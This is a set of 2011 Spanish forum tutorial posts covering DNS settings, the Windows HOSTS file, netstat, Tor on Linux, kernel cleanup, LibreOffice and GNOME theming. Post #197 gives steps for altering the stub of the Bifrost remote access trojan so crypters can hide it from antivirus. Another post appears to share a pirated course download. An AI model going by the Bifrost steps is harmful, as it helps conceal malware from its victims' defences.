    • 1.Panel de control &gt; Ver el estado y las tareas de red
    • 2.En la parte izquierda, Cambiar configuración del adaptador
    • 3.Seleccionamos la tarjeta de red que queramos cambiar. Si usamos Wi-Fi, será una conexión de red inalámbrica, si no, una conexión de área local. Con el botón derecho del ratón, Propiedades.
    • 4.En Protocolo de internet versión 4, Propiedades.
    • 5.Elegimos Usar las siguientes direcciones de servidor DNS e introducimos las que queramos.
    • 6.Aceptamos y cerramos.


    Windows XP

    [list=1]
    • No tienes permitido ver los links. Registrarse o Entrar a mi cuenta a Panel de control &gt; Conexiones de red
    • 2.Abra la conexión de red que quiera modificar
    • 3.Pulse el Botón Propiedades
    • 4.Haga Doble clic sobre Internet Protocol (TCP/IP)
    • 5.Seleccione 'Usar las siguientes DNS' e introduzca primero la de su ordenador.
    • 6.Pulse Aceptar


    Linux

    1. Edita el archivo /etc/resolv.conf

    [/list]
    Código: text
    nano /etc/resolv.conf 



    2. Tendrá un contenido similar al siguiente

    Código: text
    nameserver 80.58.61.250
    nameserver 80.58.61.254


    3. Modifica las IP's que aparecen, o añade otras nuevas

    4. Para que dichas IP's sigan vigentes tras reiniciar el sistema, edita el fichero /etc/dhcp3/dhclient.conf, y añade al final la siguiente línea:

    Código: text
    supersede domain-name-servers XX.XX.XX.XX, YY.YY.YY.YY; 



    donde XX.XX.XX.XX e YY.YY.YY.YY son, respectivamente, las IP's de las DNS primaria y secundaria deseadas. 

    5. Guarda el nuevo contenido de ambos ficheros.

    6. Y por último, para que los cambios surtan efecto inmediatamente ejecutar en un terminal (con privilegios de superusuario):

    Código: text
    /etc/init.d/networking restart 




    Mac OS X Leopard
    #190
    Windows / [Tutorial] Todo sobre el archivo HOSTS
    Julio 27, 2011, 03:52:05 PM
    Seguramente muchos de vosotros ya lo conocéis, yo tengo que reconocer que no sabía de la existencia del archivo HOSTS (Sin extensión) hasta el otro día, cuando un amigo del Chat de IV hizo la siguiente consulta: "cómo podría bloquear el acceso a ciertas páginas web, sin usar ningún software".

    En ese mismo momento no supe contestarle y tampoco los amigos que se encontraban en la sala; la preguntita se me quedó dando vueltas en la cabeza y empecé a indagar sobre el asunto, como siempre con la ayuda de SanGoogle al poco descubrí que con él archivo HOSTS (Sin extensión), podíamos hacer exactamente lo que pedía el amigo y algunas cosas más que posteriormente fui descubriendo y que paso a comentarles.




    El archivo HOSTS (Sin extensión).

    A qué viene tanto con lo de "archivo HOSTS (Sin extensión)  ": Debo decir que lo que voy a redactar a continuación es  fruto del estudio y recopilación de algunos artículos que se encuentran por la web incluida Microsoft, casi todos los autores insisten en recalcarlo ya que es un archivo que no tiene una extensión como todos los demás (.doc, .bat, .txt, etc...) "de ahí lo raro", simplemente se llama HOSTS, a partir de ahora así le nombraré pero era necesario aclararlo.



    Qué es el archivo HOSTS...?

    Cuando escribimos una dirección web ó nombre de dominio en el navegador, por ejemplo: "www.google.es", éste nombre tiene que traducirse a una Dirección IP=209.85.229.99 para que el sistema lo entienda y poder localizar el servidor solicitado. Este proceso de traducción se conoce como Resolución de Nombres



    El archivo HOSTS es un archivo utilizado por Windows a modo de "agenda" ó "libreta de direcciones" para asociar Nombres de Dominio con Direcciones IP.


    Cuando escribimos la Dirección Web en el navegador, el sistema examina primero el archivo HOSTS para ver si este contiene la Direccion IP de ese sitio, de no tenerla consultará al Servidor DNS del operador que nos dé servicio de internet ó al que nosotros hayamos configurado.

    Si la Dirección IP está en el listado del archivo HOSTS, el sitio será cargado y abierto en nuestro navegador, de esta manera tardará menos la apertura de la página.



    Si por el contrario no la tiene, entonces lanzará la pregunta al Servidor DNS, este traducirá el Nombre de Dominio a Dirección IP y se producirá la carga y apertura de la página, lógicamente  tardará más tiempo y si el Servidor DNS tiene algún fallo en ese momento la página puede que no nos cargue.

    Citar NOTA: El archivo HOSTS no es un archivo absolutamente necesario para el Sistema, por lo que podemos tenerlo ó no, de existir hara su función, si no existiera directamente el sistema hará la llamada al servidor DNS, también lo podemos crear nosotros de la siguiente forma:

    Abrimos un archivo nuevo con el Bloc de notas, lo editamos y guardamos con el nombre HOSTS sin darle ninguna extensión en las direcciones que a continuación detallo...

    Donde está y cómo se edita el archivo HOSTS...?

    A estas alturas algunos ya os estaréis preguntando cómo encontrar el dichoso archivo y sobre todo como podemos editarlo para que sirva a nuestros propósitos.


    El archivo HOSTS dependiendo de la versión de Windows lo podemos encontrar en:
    Citar•   Windows 95/98/Me: C:\Windows\ hosts
    •   Windows NT/2000: C:\WINNT\System32\drivers\etc\hosts
    •   Windows XP: C:\WINDOWS\system32\drivers\etc\hosts

    •   Windows XP 64: C:\WINDOWS\system32\drivers\etc\hosts ó C:\WINDOWS\SysWOW64\Drivers\etc\hosts
    •   Windows 2003: C:\WINDOWS\system32\drivers\etc\hosts
    •   Windows Vista: C:\WINDOWS\system32\drivers\etc\hosts
    •   Windows 7: C:\Windows\System32\drivers\etc
    Para que nos sea más sencillo encontrarlo podemos crear un acceso directo al archivo por ejemplo en el escritorio.


    Con el botón derecho del ratón pinchamos en una zona libre del escritorio y nos vamos a Nuevo\Acceso directo


    Cuando se abra la ventana ingresamos la dirección que corresponda a nuestra versión de Windows  y pinchamos en siguiente, en la nueva ventana ponemos un nombre al archivo y pinchamos en finalizar.


    En el escritorio se nos habrá creado un archivo similar a este, para abrirlo pinchamos sobre él de nuevo con el botón derecho del ratón y elegimos abrir.


    En la nueva ventana pinchamos en Notepad (Bloc de Notas) ó el que usemos y pinchamos en Aceptar.


    Citar NOTA IMPORTANTE: Siempre abriremos este archivo de esta manera exactamente, NO repito NO lo podemos predeterminar para que abra siempre con el bloc de notas.
    Una vez abierto nos encontraremos con algo parecido a esto, seguramente con algunas líneas de direcciones más.


    A partir de aquí ya podemos empezar a editar el archivo HOSTS como si se tratara de un archivo de texto.


    Si hay más datos, tales como mas direcciones y nombres de dominio, y pensamos agregar más direcciones, es recomendable hacer una copia de seguridad de este archivo, para ello lo guardamos en la misma carpeta con extensión .TXT por ejemplo, así tendríamos dos archivos, uno HOSTS y otro HOSTS.txt.


    ¿Cuál es el contenido mínimo y máximo que debe tener el archivo HOSTS...?


    En principio, el mínimo tiene que ser este:

       Código:
       
    Código: text
    127.0.0.1 localhost

    Nuestro ordenador tiene una dirección predeterminada para su propio uso, esta es conocida como la dirección "localhost", y su Dirección IP es 127.0.0.1 la cual se usa para referenciarse así mismo. Si asociamos otros nombres de dominio con nuestra Direccion IP local, habremos bloqueado  ese dominio debido a que todos los intentos por cargar ese dominio se irán a la direccion 127.0.0.1, pero eso lo veremos más adelante.


    En cuanto al máximo no parece que haya un límite conocido aunque debe haberlo, he podido leer de algunos autores que aseguran tener más de 10.000 líneas en sus archivos HOSTS.


    Algunas cosas a saber sobre el archivo HOSTS antes de ponernos a editarlo:
    Citar•   Se pueden asignar varios nombres de dominio a una misma dirección IP.
    •   El archivo se lee de arriba a abajo por lo que se deben colocar al comienzo los nombres utilizados más a menudo.

    •   Un nombre de dominio puede tener hasta 255 caracteres. En sistemas Windows no se distingue entre mayúsculas y minúsculas.
    •   Las líneas que comienzan con el signo # solo sirven para información nuestra, no tienen ningún efecto en el sistema.

    Y por Fin, para qué sirve y que podemos hacer con el archivo HOSTS...?

    Hasta ahora ya hemos visto cómo funciona, donde encontrarlo y cómo editar el archivo HOSTS. A continuación veremos algunas cosas que podemos hacer y cómo hacerlas.
    Citar•   Acelerar la descarga de las páginas más visitadas

    •   Bloquear la navegación a un dominio determinado
    •   Utilizar abreviaturas para nombres de servidores
    •   Bloquear la navegación por todos los dominios menos en uno
    •   Restaurar el archivo HOSTS a su estado original
    Empecemos:


    Acelerar la descarga de las páginas más visitadas:
    CitarPara ello añadimos al archivo HOSTS las direcciones IP de las 5 o 10 páginas que visitamos más frecuentemente, especialmente la IP de la página de inicio del navegador. 


    Podemos editar nuestro archivo HOSTS de la siguiente manera:

       Código:
       
    Código: text
    # Ejemplo de archivo HOSTS

    127.0.0.1 localhost
    209.85.229.99 www.google.es
    174.136.1.0 www.intercambiosvirtuales.org

    Ni que decir tiene que si alguna página de las que tengamos configuradas no nos abre en algún momento deberemos revisar la IP de nuevo y comprobar que no haya cambiado, de haberlo hecho deberemos actualizarla en el archivo HOSTS.


    Para conocer la IP asociada a un Nombre de Dominio podemos hacerlo con el comando PING.

    De esta forma: Pinchamos en Inicio&gt; Ejecutar,  escribimos: cmd y pinchamos Aceptar ó pulsamos Enter



    Nos abrirá la ventana de Símbolo de sistema  donde escribimos: "ping  No tienes permitido ver los links. Registrarse o Entrar a mi cuenta" y pulsamos enter, inmediatamente nos saldrá en la siguiente línea el siguiente resultado:

    Haciendo ping a intercambiosvirtuales.org  [174.136.1.0] con 32 bytes de datos:

    Donde: 174.136.1.0 será la Dirección IP de  No tienes permitido ver los links. Registrarse o Entrar a mi cuenta



    Bloquear la navegación a un dominio determinado.
    CitarSi asignamos la IP local 127.0.0.1 a un nombre de dominio en el archivo HOSTS, no se podrá navegar por las páginas web de ese dominio.


    Lo haremos de la siguiente manera:

       Código:
       
    Código: text
    # Ejemplo de archivo HOSTS

    127.0.0.1 localhost
    127.0.0.1 www.ejemplopornográfica.net


    Utilizar abreviaturas para nombres de servidores
    CitarPodemos asignar abreviaturas o nombres distintos a servidores web. Estos servidores tienen que ser dedicados (o sea, responder a una IP) y no virtuales (varios servidores responden a la misma IP).


    El siguiente archivo HOSTS provoca que al escribir "buceo", "www.sebutesa.com" o "www.buceoenlinea.com" se abra siempre la página de "www.sebutesa.com".



       Código:
       
    Código: text
    # Ejemplo de archivo HOSTS

    127.0.0.1 localhost
    66.113.214.119 buceo
    66.113.214.119 www.sebutesa.com
    66.113.214.119 www.buceoenlinea.com



    Bloquear la navegación por todos los dominios menos en uno:
    CitarEn el área empresarial nos puede interesar que los empleados únicamente puedan navegar por el sitio web corporativo. Una forma muy sencilla de conseguirlo es eliminar el servidor DNS de la configuración TCP/IP, restringir el acceso al icono Red del Panel de control y crear un archivo HOSTS que únicamente contenga una entrada: la del web corporativo.


    Sólo los expertos en TCP/IP advertirán que pueden navegar por otras páginas escribiendo la dirección IP (en el caso de servidores dedicados) o modificando el archivo HOSTS (tanto en servidores virtuales como en dedicados). Estas IPs tienen que haber sido conseguidas de algún PC que tenga el servicio DNS disponible, por lo que incluso a los expertos en TCP/IP les resultará tan incómoda esta tarea que desistirán en su intento.


    Restaurar el archivo Hosts a su estado original
    CitarComo ya hemos visto una configuración incorrecta en este archivo puede impedir la navegación por ciertas páginas o llevar a dominios que no le corresponden.

    Algunos malwares modifican el archivo HOSTS para redirigir hacia otros servidores (generalmente para impedir la actualización de antivirus u otro software de seguridad), también pueden bloquear el acceso a páginas Web de utilidad, como los antivirus en línea para dificultar el proceso de desinfección del PC.


    Si fuera nuestro caso podemos devolver el archivo HOSTS a su estado original borrando todo y anotando la línea que antes dijimos sería la única necesaria - 127.0.0.1 localhost - a continuación pondríamos los ajustes cómo lo tuviéramos configurado anteriormente.

    Si el archivo HOSTS no es el culpable, probablemente sea nuestro servidor DNS el que esté proporcionando una información incorrecta: en este caso podemos escribir la IP correspondiente en el archivo HOSTS después de haberla obtenido de otro equipo que no presente el error.


    NOTA: Una forma de proteger el archivo HOSTS en cierta medida, es marcando la casilla de: Solo Lectura en propiedades de archivo.

    Algunas utilidades "Spybot Search and Destroy por ejemplo", agregan al archivo HOSTS direcciones de conocidos sitios que descargan adwares ó spywares (comúnmente denominados parásitos ó bichos), para que estos nunca sean accedidos. Un ejemplo:


       Código:
       
    Código: text
    127.0.0.1     c3.xxxcounter.com
    127.0.0.1     califia.imaginemedia.com
    127.0.0.1     cds.mediaplex.com
    127.0.0.1     click.avenuea.com
    127.0.0.1     click.go2net.com
    127.0.0.1     click.linksynergy.com
    127.0.0.1     cookies.cmpnet.com
    127.0.0.1     cornflakes.pathfinder.com
    127.0.0.1     counter.hitbox.com

    Otros cómo "ZoneAlarm" agregan una protección contra la modificación no autorizada del archivo HOSTS.


    Fuente: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
    #191
    1. Introducción




    2. Hola mundo




    3. Tipos de datos básicos




    4. Referencia de objeto (Variables)




    5. Colección de tipos de datos




    6. Operaciones lógicas




    7. Operador de pertenencia (in)




    8. Uso de if, elif, else, and, or




    9. Estructura de control while




    10. Estructura de control for




    11. Introducción a excepciones




    12. Excepciones continue break input




    13. Funciones




    14. Operadores aritméticos




    Como verán Python es un lenguage muy fácil de aprender ;)
    #192
    Video-Tutorial: Java Script Basico


    -


    Los creditos doy al canal de PMVT tutoriales por ofrecerme la posibilidad de compartir el video curso de JAVA SCRIPT. se supone que es un curso basico pero ya hay que tener conocimiento de muchas cosas como porejemplo, conceptos basicos de java, para que se usa, que es, quien lo usa y como se hace.




    No tienes permitido ver los links. Registrarse o Entrar a mi cuenta




    No tienes permitido ver los links. Registrarse o Entrar a mi cuenta




    No tienes permitido ver los links. Registrarse o Entrar a mi cuenta




    No tienes permitido ver los links. Registrarse o Entrar a mi cuenta




    No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


    #193
    GNU/Linux / Navegar con Proxy "Tor" en GNU/Linux
    Julio 14, 2011, 01:25:20 PM
    Bueno este post fue ideado para todos aquellos que usamos alguna distribución de Linux, ya sea debían y sus derivados, todo empezó cuando&nbsp;&nbsp; utilice&nbsp; una conexión con módem usb de tigo, y casi siempre que iba a descargar me decia que ya estaba descargando algun fichero o simplemente que ya habia llegado a mi limite e descargas y buscando en la red encontre una solucion, con la cual podemos cambiar nuestra ip,&nbsp; ahhh y otra es que en windows se escucha de muchos programas para ocultar nuestra ip, y en este post les demostrare que tambien se puede en Linux sin ningun tipo de licencia, empecemos


    Los programas que ocultan tu ip para winbugs hace lo siguiente: No oculta tu ip, me refiero a que sigues teniendo una, lo que hace es  conectarte a un proxy de forma que a vista del exterior tienes otra ip,  siendo aun asi facil de identificar.


    Tor hace lo siguiente: Tor para  GNU/Linux  a de realizar lo  mismo, o quizás lo hace mejor. Tor no te conecta a un sólo proxy, si no  que a cientos de ellos de forma que intentar averiguar tu IP, desde  fuera, es muy dificil o casi imposible.






    INSTALACION Y CONFIGURACION


    Primero un poco de lo que vamos a usar:


    * Tor (The onion router) es un proyecto de software libre y una  red abierta que nos ayuda a defendernos contra cualquier tipo de  análisis de tráfico permitiéndonos navegar de libremente y de forma  anónima.
    * Polipo: proxy HTTP de caché, que maneja SOCKS4a, lo que evita  que Firefox envíe las solicitudes de DNS por fuera de la red Tor,  poniendo en peligro el anonimato. También acelera la navegación usando  la red Tor.
    * Vidalia: interfaz gráfica para configurar Tor. Muy útil y fácil de manejar.

    * Torbutton: extensión de Firefox que nos permite habilitar/deshabilitar la navegación usando Tor.


    AHORA SI ENTREMOSLE A LA INSTALACION:


    1. Vamos a agregar tor a los repositorios, y para eso copiamos y pegamos el siguiente comando en una terminal:


    REPOSITORIO TOR:


    echo deb No tienes permitido ver los links. Registrarse o Entrar a mi cuenta $(lsb_release -cs) main | sudo tee /etc/apt/sources.list.d/torproject.list


    2. Ahora agregamos la clave del repositorio que acabamos de agregar:
    Citar
    CLAVE DE REPOS dijo:




    gpg  –keyserver No tienes permitido ver los links. Registrarse o Entrar a mi cuenta –recv 886DDD89 &amp;&amp; gpg –export  A3C4F0F979CAA22CDBA8F512EE8CBC9E886DDD89 | sudo apt-key add -


    3. Actualizamos los repositorios:
    Citar
    ACTUALIZAR REPOS:



    sudo aptitude update


    4. Instalamos el tor con el siguiente comando (tambien instala polipo):

    Citar
    INSTALAR TOR Y POLIPO:

    sudo aptitude install tor tor-geoipdb

    5. Ahora instalamos Vidalia con el siguiente comando:
    Citar
    INSTALACION DE VIDALIA:


    sudo aptitude install vidalia



    Durante la instalación de Vidalia nos va a preguntar si queremos que  sea Vidalia quien se encargue del arranque de Tor. Lo mejor es  contestar Yes (and disable it for every boot) si queremos controlar con  Vidalia el uso de Tor. De esta forma Tor se iniciará sólo cuando  ejecutemos Vidalia. De forma que si no pensamos usar Tor cada vez que  nos conectemos a Internet, es una muy buena opción. Pero cada uno que  seleccione lo que se adapte a sus condiciones o circunstancias.





    6. Descargamos el archivo de configuracion de polipo para usar con tor, con este comando:
    ARCHIVO CONFIGURACION POLIPO:
    wget No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

    7. Vamos a hacer una copia de seguridad de la configuracion original de polipo con este comando:
    Citar
    COPIA DE SEGURIDAD POLIPO:




    sudo cp /etc/polipo/config{,.original}


    8. Vamos a reemplazar el archivo original por el descargado con este comando:
    Citar
    REEMPLAZO ARCHIVO ORIGINAL :



    sudo mv polipo.conf /etc/polipo/config


    La configuracion que estamos reemplazando se hace porque esta ya  esta modificada con todos los cambios recientes para que no de problema  en ubuntu 10.04.


    9. Reiniciamos el polipo con este comando:

    Citar
    REINICIAR POLIPO:

    sudo service polipo restart

    10.  Ejecutamos Vidalia para iniciar Tor y comprobar que todo se ha  instalado correctamente. Para esto hacemos clic en el menú Aplicaciones  &gt; Internet &gt; Vidalia.

    11. Vidalia intentará iniciar Tor automáticamente y si todo ha ido bien veremos la siguiente ventana:





    12. Ahora la instalacion de TorButton: Vamos a ir a la siguiente página: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta .





    13.  En la parte superior veremos un mensaje de Firefox en el que se nos  indica que ha evitado que se instale el Torbutton, pero como nosotros  queremos instalarlo tenemos que pulsar el botón Permitir (en otros  navegadores todavia no lo he probado, se los dejo como tarea.





    14. Le damos instalar ahora:



    15. Reiniciamos firefox:



    17. Ahora ya esta todo instalado y para probarlo vamos a la siguiente pagina: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta



    18. Como tenemos Tor desactivado, la página nos lo mostrará  directamente. Para activarlo hacemos clic en el botón que hay en la  parte inferior derecha con el nombre  Tor desactivado. 19. Ahora que ya esta  habilitado, recargamos la página o volvemos a acceder a la web No tienes permitido ver los links. Registrarse o Entrar a mi cuenta para comprobar que estamos usando Tor.



    20.  Ya con eso esta todo listo y estaremos navegando ANONIMAMENTE y  protegiendo nuestra pc en tiempo real contra ataques virtuales o incluso  para saltarnos algunas prohibiciones de algunas paginas, quiero añadir que este tutorial por así decirlo, es una colaboración de otras personas, de mi parte solo esta la intención de incrementar los conocimientos de los compañeros que usan GNU/Linux y tienen este tipo de problemas, encontrándoles una solución, para que no abandonen este distribución que tiene mucho que dar y además no tengan nada que envidiar a winbugs.


    Fuente: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
    #194



    After Effects es la aplicación de Adobe destinada a la postproducción y Motion graphics, perfectamente integrada en la Creative Suite 5, y comunicándose perfectamente con Adobe Premiere, Adobe Encore, Photoshop, Illustrator, etc. After Effects es el programa con más trayectoria en el entorno PC y Mac, lo que le ha permitido crecer y evolucionar desde principios de los años 90. Tras estos cursos podrás enfrentarte a muchos proyectos de postproducción y Motion Graphics avanzados que antes te habrían resultado inalcanzables.



    Pass: elkape (tipear el password, no copiarlo y pegarlo)





    No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
    #195
    Windows / 10 Ejemplos Utiles del Comando netstat
    Julio 03, 2011, 03:13:39 PM
    El comando netstat muestra varias informaciones relacionadas a la red, tales como conexiones de red, tablas de ruteo, estadísticas, conexiones enmascaradas, miembros multicast, etc.

    En este articulo se revisara 10 ejemplos practicos sobre el uso del comando netstat.

    1) Listar todos los puertos (Abiertos y No abiertos)

    Listar todos los puertos usando netstat -a

    # netstat -a | more

    Listar todos los puertos TCP usando netstat -at

    # netstat -at

    Listar todos los puertos UDP usando netstat -au

    # netstat -au

    2) Listar todos los sockets que esten estado Listening

    Listar solo los puertos en Listening usando netstat -l

    # netstat -l

    Listar solo los puertos TCP que esten en Listening usando netstat -lt

    # netstat -lt

    Listar solo los puertos UDP que esten en Listening usando netstat -lu

    # netstat -lu

    Listar solo los puertos UNIX que esten en Listening usando netstat -lx

    # netstat -lx

    3) Mostrar las estadisticas de cada protocolo

    Mostrar las estadísticas de cada puerto usando netstat -s

    # netstat -s

    Mostrar estadísticas para puertos TCP o UP usando netstat -st o netstat -su

    # netstat -st
    # netstat -su

    4) Mostrar PID y nombre de programa en la salida de netstat usando netstat -p

    La opción netstat -p puede ser combinada con cualquier otra opción. Esto agregara el "PID/Nombre Programa" a la salida del netstat. Esto es muy útil cuando se esta depurando para identificar que programa esta ejecutándose en un puerto en particular.

    # netstat -pt

    5) No mostar el host, puerto y nombre del usuario en la salida del netstat

    Cuando no quieres que se muestre el nombre del host, puerto y el usuario usa la opción netstat -n. Esto mostrara en números , en vez de el nombre del host, puerto y el usuario.

    Esto también aumenta la velocidad de la salida ya que netstat no realiza ningún look-up

    # netstat -an

    Si no deseas que se muestren solo alguno de estos tres (puerto, host o usuario) usa lo siguiente:

    # netsat -a --numeric-ports
    # netsat -a --numeric-hosts

    # netsat -a --numeric-users

    6) Imprimir la información de netstat continuamente

    netstat imprimirá la información continuamente cada ciertos segundos

    # netstat -c

    7) Encontrar las familias de direcciones no soportadas en tu sistema

    netstat --verbose

    Mostrar información de ruteo de kernel usando netstat -r

    # netstat -r

    Nota: Usa netstat -rn para mostrar en formato numerico sin resolver el nombre del host.

    9) Buscar en que puerto se esta ejecutando un programa

    # netstat -ap | grep nombre del programa

    10) Mostrar la lista de las interfaces de red

    # netstat -i

    Mostrar mas detalles sobre la informacion de las interfaces de red (similar a ifconfig)

    # netstat -ie
    #196
    GNU/Linux / Como eliminar kernels desfasados
    Junio 13, 2011, 02:41:09 PM
    Sucede que a medida de que nuestro sistema se actualizando, nuevos núcleos del sistema Linux se van instalando. Los anteriores permanecen en el sistema por si  necesitáramos usarlos. Esto se ve claramente al arrancar la máquina en la pantalla de selección de sistemas operativos del grub.


    Además de la sobrecarga del menú del grub por núcleos de Linux que ya no vamos a usar, estos ocupan una cantidad no despreciable en nuestro disco duro.


    Eliminarlos es bastante fácil haciendo uso de un terminal. Abrimos uno pulsando simultáneamente CTRL+ATL+T o desde Aplicaciones - Accesorios - Terminal.


    Si nuestro sistema no tiene aptitude instalado lo instalamos mediante



    Código: text
    sudo apt-get install aptitude



    Una vez instalado aptitude nos vamos a servir de él para conocer los núcleos instalados mediante el siguiente comando:


    Código: text
    aptitude search ~ilinux-image-2



    Se mostrará un listado con los kernels instalados. De estos uno es el que estamos usando y no debemos borrarlo. Seguramente será el más reciente, indicado por su número de versión. El más reciente es el que tiene número de versión superior. Para asegurarnos podemos usar el comando siguiente que nos indica el kernel en uso.


    Código: text
    uname -r



    Una vez sabemos cual NO debemos borrar podemos empezar a borrar los más viejos. El comando para hacerlo será:


    Código: text
    sudo aptitude purge nombre_del_kernel



    Donde cambiaremos nombre_del_kernel por el correspondiente al núcleo que queremos borrar. Tras unos segundos el kernel quedará borrado.

    Fuente: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
    #197
    Bueno pues al acabar los pasos del tutorial podremos encriptar el server del Bifrost con crypters que no tengan la opción de soportar EOF Data.

    Necesitaremos el Bifrost 1.2.1 Desempaquetado, el Resource Hacker y el Stud_PE.

    1) Primero abrimos el Bifrost con el Resource Hacker y seleccionamos el STUB así, luego damos a
    Action --&gt; Save resource as binary file y lo guardamos como .exe .

    No tienes permitido ver los links. Registrarse o Entrar a mi cuenta2) Luego abrimos el Stud_PE y seleccionamos el Stub que guardamos antes.

    No tienes permitido ver los links. Registrarse o Entrar a mi cuenta3) Luego vamos a la pestaña Sections.

    No tienes permitido ver los links. Registrarse o Entrar a mi cuenta4) Damos click derecho a la sección rsrc y damos a Edit Header y modificar los valores como puse en la imgen.

    No tienes permitido ver los links. Registrarse o Entrar a mi cuenta5) Damos a save y cerramos el Stud_PE.

    6) Ahora introduciremos el Stub modificado en el Bifrost, para ello abrimos el Resource Hacker y abrimos el Bifrost, seleccionamos el Stub como el la imagen y damos click derecho --&gt; Replace Resource y seleccionamos el Stub modificado.

    No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
    #198


    Download MediaFire
    No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

    Autor: XXRadaR
    #199
    Libreoffice español



    Instrucciones:

    Instalar Libreoffice


    1- Abre la consola de comandos o terminal y escribe:


    sudo apt-get purge openoffice*.*


    Desinstalar Libreoffice

    1- Abre la consola de comandos o terminal y escribe:


    sudo apt-get install libreoffice

    Traducir Libreoffice


    1- Primero abre la consola de comandos o terminal y escribe:

    sudo apt-get install libreoffice-l10n-es

    2- Presionar la letra "S" y despues damos un "enter".

    3- Para finalizar, esperas a que termine de instalar el paquete de idioma y listo tendran Libreoffice 100% en español.


    Nota: No es necesario descargar archivos ni nada por el estilo, solo sigan este procedimiento, es necesario tener conexion a internet.
    #200
    na de las cosas que nos permite hacer los escritorios de Linux a diferencia de otros escritorios de otros sitemas operativos, es la de poder personalizar todo lo que se vea en la pantalla (bordes de la ventana, estilo de botónes, barras, paneles, íconos, agregrar efectos, entre muchas cosas mas.

    Esta guía tiene como finalidad explicarte brevemente como tener un escritorio bien personalizado bajo GNOME (para KDE buscar otra guía). Si deseas que tu escritorio se parezca a Windows vista ó MacOs X, debes visitar las siguientes páginas:


    No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
    • No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

      Wallpaper:

      En mi opinión es la parte mas fácil y mas llamativa de cambiar, primero debes conseguir un wallpaper de cualquier sitio pero que se adapte correctamente a tu resolución y para cambiarlo simplemete haz clic con el botón derecho del mouse en el escritorio y selecciona la última opción (Cambiar escritorio). Simplemente le das añadir y buscas el archivo de imagen que deseas poner como fondo.

      Páginas que recomiendo para bajar fondos:
      No tienes permitido ver los links. Registrarse o Entrar a mi cuenta-No tienes permitido ver los links. Registrarse o Entrar a mi cuenta-No tienes permitido ver los links. Registrarse o Entrar a mi cuenta-No tienes permitido ver los links. Registrarse o Entrar a mi cuenta.


      Controles GTK:

      Los controles GTK sirven para cambiar la apariencia de las ventanas de programas hechos en GTK (todo los que se hace para Gnome), esto incluye cambiar la apariencia de los botónes, menús, barras de desplazamiento, barras de carga, fondo de las ventanas, entre muchas otras cosas.

      Por ejemplo estas imágenes muestran diferencias:

      La imagen de la izquierda muestra los controles GTK que vienen por defecto en Gnome(llamados Clearlooks) y la de la derecha muestra unos controles GTK personalizados (llamado Murrina Dark)


      Cambiar estos temas suele ser bien para la vista, algunos son muy buenos e imitan los otros sistemas operativos, otros son oscuros, claros, alegres, futuristas, etc. Es importante saber que algunos temas requieren ciertos motores para funcionar, por lo que si ves que el tema no se muestra correctamente necesitas el motor (por ejemplo los temas Murrina necesitan el motor del mismo nombre). Para cambiar el tema, primero descarga un tema te guste de la sección GTK 2.x de Gnome Look (es la mejor página para ello). Luego entra a Sistema->Preferencias->Tema o Apariencia (ó ejecutar gnome-theme-manager en consola o gnome-appearance-properties si usas Gnome >= 2.22), arrastras el tema que bajaste hasta esta ventana (o le das clic en instalar), haces clic en el botón Personalizar luego te vas la pestaña que dice Controles y seleccionas de la lista el tema que instalaste. El cambio se aplica inmediatamente, no hay que esperar :P.


      Iconos de GNOME:

      En mi opinión los íconos que trae Gnome por defecto me parecen muy feos. Sin embargo se pueden cambiar por otros, para hacerlo se hace exactamente que con los controles GTK, sólo que en vez de hacer clic en la pestaña de Controles, se hace clic en la de Iconos y se selecciona uno de la lista.

      Se pueden descargar temas de íconos desde los sitios No tienes permitido ver los links. Registrarse o Entrar a mi cuenta ó No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


      Tema de íconos NuoveXT2 uno de los muchos que se pueden instalar


      Borde de las Ventanas: (Sin usar Beryl/Compiz)

      Aqui explicaré como cambiar el borde las ventanas si estan utilizando metacity (el defecto por GNOME si no se usa Beryl/Compiz). El procedimiento es exactamente igual que para cambiar los íconos y controles GTK. Con el programa gnome-theme-manager( o gnome-appearance-properties si usas Gnome >= 2.22) (Sistema->Preferencias->Tema o Apariencia), arrastras hacia el mismo el archivo con el tema que bajaste. Le das a al botón de, Preferencias, luego en la pestaña de Metacity (Borde de ventana) seleccionas de la lista el que deseas y listo.

      Para bajar temas para el borde las ventanas, puedes visitar: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta ó No tienes permitido ver los links. Registrarse o Entrar a mi cuenta.   



      El borde de ventanas SystemG


      Borde de las Ventanas con Emerald: (Usando Beryl/Compiz)


      Este método es si estan usando Emerald (el decorador de ventanas de Beryl/Compiz). Para ello podemos descargar los temas desde Gnome-Look ó Beryl Themes. Y una vez ejecutado Beryl-Manager (Debe aparecer el icono de beryl en el panel de gnome), haz clic derecho sobre él, luego en Emerald Theme Manager (se puede ejecutar emerald-theme-manager para abrir desde la consola) y aparecerá un programa listando los temas actuales, le damos al botón Import (Importar), seleccionamos el archivo con el tema que descargamo para instalarlo y ¡listo! Ahora aparece en la lista de temas el que instalamos, selecciona el que deseas y eso es todo.




      Otra cosa que se puede hacer con este modo de decorado de ventanas, es que se puede editar fácilmente el tema que descargamos, sólo con hacer clic en la pestaña de editar, entraremos a un editor del tema donde podremos cambiarle los colores, agregar transparencias, modificar bordes, sombras, grosores de bordes, fuentes, entre muchas cosas mas. No entro en detalle a esto debido a que es fácil de usar y se aprende en poco tiempo.


      Editor de temas de Emerald.


      Cambiar el icono del menú principal de Gnome:

      Si están usando el menú principal de GNOME (el botón que agrupa las opciones de Aplicaciones, Lugares y Sistema en un sólo botón), el ícono del mismo puede cambiarse con el Editor de configuración de GNOME (desde consola se puede abrir con gconf-editor) que se encuentra en Aplicaciones->Herramientas del Sistema ->Editor de Configuración. Una vez que abra el programa observaremos a lado izquierdo una serie de directorios con información de configuraciones para varios programas. Para cambiar el ícono del menú, navegamos por las carpetas a la ruta /apps/panel/objects/ y aparecerán unas carpetas llamadas object_0, object_1... Por lo que tenemos que navegar por cada una de ellas y fijarnos en la parte derecha de la ventana cual de ellas tiene como opción de object_type = menu-object.

